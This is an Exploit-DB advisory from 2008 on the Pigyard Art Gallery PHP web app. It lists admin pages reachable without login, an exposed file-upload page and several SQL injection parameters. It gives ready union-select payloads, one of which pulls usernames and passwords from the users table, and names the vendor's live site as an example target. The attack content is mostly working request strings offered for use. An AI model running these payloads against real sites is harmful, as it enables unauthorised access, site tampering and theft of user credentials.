pigyard art Gallery - Multiple Vulnerabilities

EDB-ID:

5181

CVE:


EDB Verified:

Author:

ZoRLu

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-02-24

Vulnerable App: 
###################################################################

Pigyard Art Gallery Multiple Remote Vulnerabilities

Script Buy Now : http://www.pigyardgallery.com/how_to_buy.php 

author: ZoRLu     

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

not: msn i ekleyipte aptal aptal konusmayýn yok ben seni eklemedim sen beni ekledin vs. sorularýnýz varsa sorarsýnýz cins cins konuþacaksanýz eklemeyin. 

##################################################################

Pigyard Art Gallery not to login admin. but the edit config web site 

this exploit:

Pictures Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_pictures

example web sites:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_pictures

Availibility Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_availibilities

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_availibilities

Exhibitions Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_exhibitions

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_exhibitions

Genres Edit & Add: 

http://localhost/module.php?module=gallery&modPage=view_genres

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_genres

Media Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_media

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_media

Artist Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_artists

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_artists

Empty Artists and Exhibitions Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_empty_picture_associates

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_empty_picture_associates


#########################################################################

File Upload:

http://localhost/php/templates/file_uploader/file_selector.php

example:

http://www.pigyardgallery.com/php/templates/file_uploader/file_selector.php


#######################################################################

SQL inj.

exploit 1:

http://loaclhost/module.php?module=gallery&modPage=show_pictures&artist=[SQL]

exploit 2:

http://loaclhost/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]

exploit 3:

http://loaclhost/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]


example web site:


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&artist=[SQL]


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]


example [SQL] : 

-1/**/union/**/select/**/0,1,2,3,4/*   ( to me don't script available. so table name and columns name not find. but this to script sql inj available)

##########################################################################

thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r,  KoDLoK(vur6un), siircicocuk, Dr.SaLTuK, kasIrga(lavrens), w3R3m

avkidis, head_hunter and all users yildirimordulari.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :))  )

Efsane: YILDIRIMORDULARI.ORG

######################################################################


Added a default sql injection string by Aria-Security Team     /str0ke

Aria-Security Team, 
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal, iM4N, Kinglet,
Vendor: Pigyard Art Gallery Multiple SQL Injection
This is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181)

Original Link: http://forum.aria-security.net/showthread.php?p=1474

module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*
module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*


Regards,
The-0utl4w





# milw0rm.com [2008-02-24]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services